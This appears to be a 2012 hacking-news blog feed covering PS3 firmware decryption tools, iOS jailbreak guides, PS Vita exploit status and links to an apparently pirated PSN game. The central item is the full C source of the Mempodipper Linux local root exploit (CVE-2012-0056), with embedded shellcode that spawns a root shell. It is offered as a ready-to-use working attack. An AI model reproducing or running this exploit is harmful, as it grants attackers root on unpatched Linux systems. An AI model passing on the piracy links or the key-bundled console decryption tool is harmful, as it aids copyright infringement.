Changes
-------
v1.0 – Initial release
v1.1 – Added more tasks
v1.2 – Keys bug fixed
v1.3 – Fixed bug on folders
v2.1 – Added options menu in help screen
- “pup_PD.exe” modified, now can unpack “spkg_hdr.tar” and “ps3swu2.self” files on 3.56+ PUP
- Added function to decrypt “index.dat”
- Added function to unpack RCO files
- Added function to unpack and convert VAG to WAV files
v2.2 – Added function to decrypt and unpack Core_OS

What can we do automatically with this program?
-----------------------------------------------
- Unpack PUP
- Decrypt TAR/PKG/SELF
- Decrypt index.dat
- Decrypt Core_OS
- Unpack Core_OS
- Unpack decrypted TAR/PKG
- Unpack RCO files
- Unpack and decrypt VAG to WAV files
__________________________________________________________________________________________________
$ ./pup_unpacker.exe
PUP Unpacker & Decrypter v2.2
By Evilnat

Usage: pup_unpacker.exe [OPTION] filename.pup directory
Example: pup_unpacker.exe -all PS3UPDAT.PUP OFW355

Options (ONLY CHOOSE ONE):
  -h, --help          displays this help
  -x, --un-pup        unpack PUP files only
  -e, --un-tar        unpack update_files.tar of PUP only
  -c, --deun-core     decrypt and unpack Core_OS of PUP file only
  -t, --deun-tar      decrypt and unpack TAR files of PUP only
  -p, --deun-pkg      decrypt and unpack all PKG files of PUP only
  -s, --de-self       decrypt all SELF files of PUP only
  -i, --de-index      unpack and decrypt index.dat of PUP only
  -v, --conv-vag      unpack and convert VAG to WAV files of PUP only
  -r, --deun-rco      decrypts and unpack RCO files of PUP only
  -all, --deun-all    unpack and decrypt entire PUP files
__________________________________________________________________________________________________
- Usage:
1) Unpack the folder from the RAR into your home directory in Cygwin (C:\cygwin\home\XXXX\Unpacker)
2) Copy the PS3UPDAT.PUP file you want into it
3) Open Cygwin’s console and enter the folder
4) Type the following (OFW_355 is an example, you can change this):
./pup_unpacker.exe [OPTION] PS3UPDAT.PUP OFW_355
[ Example: ./pup_unpacker.exe -all PS3UPDAT.PUP OFW_355 ]
5) Depending on the option you have chosen, the executable will now do it all automatically
All is done; the “dev_decrypted_unpacked” folders contain the decrypted SELF files.
This program requires certain exe files and PS3 keys that are included in the RAR. DON’T DELETE THEM.
If an error occurs it will stop automatically, showing what has happened.
Hope this helps someone
--------------------------------------------------------------------
Thanks to: KaKaRoTo, Waninkoko, Geohot, Team Overflow, and more DEVS
--------------------------------------------------------------------
Evilnat (PS3SOS/PSVITASOS)
Jan 24 2012
PS3 PUP Unpacker & Decrypter 2.2 Released – Download
Jan 24 2012
Absinthe Jailbreak 0.3 Released – Download
Jan 24 2012
Trash.Box.PSN.PS3-DUPLEX Released – Download
Size: 1362 MB
http://depositfiles.com/files/mpbiz3anw/Trash.Box.PSN.PS3-DUPLEX.part1.rar
http://depositfiles.com/files/cnmurziw5/Trash.Box.PSN.PS3-DUPLEX.part2.rar
Jan 24 2012
PS3 TrueBlue 2.5 Released – Download
TrueBlue 2.5 Updater is ready for release, and as usual it adds more ‘Game Compatibility Fixes’ so that more patched EBOOTs can be released for the remaining v3.6+ Sony PS3 games, along with room for future support of the upcoming v4.01 firmware, which is now being tested by Sony on the DEBUG machines.
Change log:
- Requires True Blue CFW v2
- Game compatibility fixes
NOTE: You need to update to the v2 of CFW that was released back on Jan. 17th, 2012 for this v2.5 Updater to install!
Direct Link to the New v2.5 Updater: –> TrueBlueUpdate-2.5.zip (425.6kb)
Jan 24 2012
Jailbreak Statistics
Here’s a quick breakdown of how many A5 owners have jailbroken their devices since Friday morning. The numbers as of Monday afternoon are:
- 491,325 new iPhone4,1 devices
- 308,967 new iPad2 devices
- 152,940 previously jailbroken (at 4.x) iPad2 devices
Total: 953,232 new A5 jailbreaks in a little over 3 days
Jan 24 2012
Hack – Linux Local Root Via SUID /proc/pid/mem Write
/*
 * Mempodipper
 * by zx2c4
 *
 * Linux Local Root Exploit
 *
 * Rather than put my write up here, per usual, this time I've put it
 * in a rather lengthy blog post: http://blog.zx2c4.com/749
 *
 * Enjoy.
 *
 * - zx2c4
 * Jan 21, 2012
 *
 * CVE-2012-0056
 */
#define _LARGEFILE64_SOURCE
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <fcntl.h>
#include <unistd.h>
#include <limits.h>

int send_fd(int sock, int fd)
{
    char buf[1];
    struct iovec iov;
    struct msghdr msg;
    struct cmsghdr *cmsg;
    int n;
    char cms[CMSG_SPACE(sizeof(int))];

    buf[0] = 0;
    iov.iov_base = buf;
    iov.iov_len = 1;

    memset(&msg, 0, sizeof msg);
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = (caddr_t)cms;
    msg.msg_controllen = CMSG_LEN(sizeof(int));

    cmsg = CMSG_FIRSTHDR(&msg);
    cmsg->cmsg_len = CMSG_LEN(sizeof(int));
    cmsg->cmsg_level = SOL_SOCKET;
    cmsg->cmsg_type = SCM_RIGHTS;
    memmove(CMSG_DATA(cmsg), &fd, sizeof(int));

    if ((n = sendmsg(sock, &msg, 0)) != iov.iov_len)
        return -1;
    close(sock);
    return 0;
}

int recv_fd(int sock)
{
    int n;
    int fd;
    char buf[1];
    struct iovec iov;
    struct msghdr msg;
    struct cmsghdr *cmsg;
    char cms[CMSG_SPACE(sizeof(int))];

    iov.iov_base = buf;
    iov.iov_len = 1;

    memset(&msg, 0, sizeof msg);
    msg.msg_name = 0;
    msg.msg_namelen = 0;
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;

    msg.msg_control = (caddr_t)cms;
    msg.msg_controllen = sizeof cms;

    if ((n = recvmsg(sock, &msg, 0)) < 0)
        return -1;
    if (n == 0)
        return -1;
    cmsg = CMSG_FIRSTHDR(&msg);
    memmove(&fd, CMSG_DATA(cmsg), sizeof(int));
    close(sock);
    return fd;
}

int main(int argc, char **argv)
{
    if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'c') {
        char parent_mem[256];
        sprintf(parent_mem, "/proc/%d/mem", getppid());
        printf("[+] Opening parent mem %s in child.\n", parent_mem);
        int fd = open(parent_mem, O_RDWR);
        if (fd < 0) {
            perror("[-] open");
            return 1;
        }
        printf("[+] Sending fd %d to parent.\n", fd);
        send_fd(atoi(argv[2]), fd);
        return 0;
    }

    printf("===============================\n");
    printf("= Mempodipper =\n");
    printf("= by zx2c4 =\n");
    printf("= Jan 21, 2012 =\n");
    printf("===============================\n\n");

    int sockets[2];
    printf("[+] Opening socketpair.\n");
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sockets) < 0) {
        perror("[-] socketpair");
        return -1;
    }
    if (fork()) {
        printf("[+] Waiting for transferred fd in parent.\n");
        int fd = recv_fd(sockets[1]);
        printf("[+] Received fd at %d.\n", fd);
        if (fd < 0) {
            perror("[-] recv_fd");
            return -1;
        }
        printf("[+] Assigning fd %d to stderr.\n", fd);
        dup2(2, 6);
        dup2(fd, 2);

        unsigned long address;
        if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'o')
            address = strtoul(argv[2], NULL, 16);
        else {
            printf("[+] Reading su for exit@plt.\n");
            // Poor man's auto-detection. Do this in memory instead of relying on objdump being installed.
            FILE *command = popen("objdump -d /bin/su|grep '<exit@plt>'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\\([^0]*\\)/0x\\1/'", "r");
            char result[32];
            result[0] = 0;
            fgets(result, 32, command);
            pclose(command);
            address = strtoul(result, NULL, 16);
            if (address == ULONG_MAX || !address) {
                printf("[-] Could not resolve /bin/su. Specify the exit@plt function address manually.\n");
                printf("[-] Usage: %s -o ADDRESS\n[-] Example: %s -o 0x402178\n", argv[0], argv[0]);
                return 1;
            }
            printf("[+] Resolved exit@plt to 0x%lx.\n", address);
        }
        printf("[+] Calculating su padding.\n");
        FILE *command = popen("/bin/su this-user-does-not-exist 2>&1", "r");
        char result[256];
        result[0] = 0;
        fgets(result, 256, command);
        pclose(command);
        unsigned long su_padding = (strstr(result, "this-user-does-not-exist") - result) / sizeof(char);
        unsigned long offset = address - su_padding;
        printf("[+] Seeking to offset 0x%lx.\n", offset);
        lseek64(fd, offset, SEEK_SET);

#if defined(__i386__)
        // See shellcode-32.s in this package for the source.
        char shellcode[] =
            "\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\x31\xc9\xb3"
            "\x06\xb1\x02\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68"
            "\x68\x2f\x2f\x62\x69\x89\xe3\x31\xd2\x66\xba\x2d\x69\x52\x89"
            "\xe0\x31\xd2\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd"
            "\x80";
#elif defined(__x86_64__)
        // See shellcode-64.s in this package for the source.
        char shellcode[] =
            "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x40"
            "\xb7\x06\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f\x2f\x62\x69"
            "\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xdb"
            "\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50\x51\x57\x48"
            "\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";
#else
#error "That platform is not supported."
#endif
        printf("[+] Executing su with shellcode.\n");
        execl("/bin/su", "su", shellcode, NULL);
    } else {
        char sock[32];
        sprintf(sock, "%d", sockets[0]);
        printf("[+] Executing child from child fork.\n");
        execl("/proc/self/exe", argv[0], "-c", sock, NULL);
    }
}
Jan 24 2012
How To – Jailbreak iPhone 4S/ iPad 2 on iOS 5.0.1 Using Absinthe For Windows
STEP 1: Download Absinthe Jailbreak v.0.2
STEP 2: After the download finishes, open Absinthe in Administrator mode, then plug in your iPhone 4S/iPad 2.
STEP 3: Now allow the app to recognize your device, and you will see that the “Jailbreak” button has appeared.
STEP 4: After the program is done running (and not a second before), go to your device’s home screen and locate the Absinthe icon. Click it. This executes the final stage of the jailbreak.
STEP 5: After the jailbreak is done, your device will restart and you should then see Cydia installed on your device.
Update: Fix “Error Establishing a Database Connection” While Jailbreaking with Absinthe
Simply go to Settings > General > Network > VPN > ON, and you will not see this error message again.
Update: Fix Camera Roll Error After Jailbreaking iPhone 4S And iPad 2
You can do so simply by rerunning the jailbreak on your iDevice.
Jan 22 2012
How To – Install Cydia 1.1.4 Without Jailbreak
It is presumably optimized for A5 iDevices, so there is no change from v1.1.3 on an A4 model.
Since Cydia 1.1.3 you may have noticed that the Cydia application is very stable and does not crash as before.
This is an unofficial version for A4 iDevices jailbroken with Redsn0w/Ac1dsn0w, extracted from a jailbroken iPad 2 and compiled by crowie85.
Update to Cydia 1.1.4 Without Re-Jailbreak:
If you have iFile installed,
go to Safari and type http://www.SpiritJB.org/cydia114/
then open the file using iFile and press Installer, and it will update
see How to install .Deb file Example from here
(Not to Auto Install, installation MyFile iFile or recommended).
Jan 22 2012
How To – Install .DEB Files on iPhone / iPod / iPad
How to Install (Method 1) :
- SSH into the iPhone, using iPhoneTunnel if you’re on Windows or Cyberduck if you’re on MacOS.
- Copy the .deb file into the tmp folder
- Quit Cydia if it’s running
- Hit Ctrl+T in WinSCP and run the following command: dpkg -i /tmp/name.deb (just to make sure: replace name.deb with the actual name of the deb file)
- After installation, you can delete the .deb file
How to Install (Method 2) :
- SSH into your iPhone and go to /var/root/Media/Cydia/AutoInstall. Copy the .deb file there and then just reboot your device. If the AutoInstall folder does not exist in /var/root/Media/Cydia, you can create it yourself.
How to Uninstall :
To uninstall the .deb file, simply uninstall the app you installed via the .deb file. You can use Cydia, Icy or Cydelete to uninstall from SpringBoard too.
Jan 22 2012
PS Vita – SKFU FW 1.52 Status Confirmed
Developer SKFU has taken the leap and updated his PS Vita to the latest firmware 1.52. Many are anticipating a firmware update that will block the recent exploits/findings achieved by Teck4, Wololo & SKFU. SKFU has confirmed that it is safe to update your PS Vita to 1.52 since all exploits are still functioning.
To Quote:
- Tech4’s exploit still works
- Wololo’s HBL still works
- everything I research atm didn’t change from 1.50 to 1.52
- If that is fine for you, there’s no reason not to update.

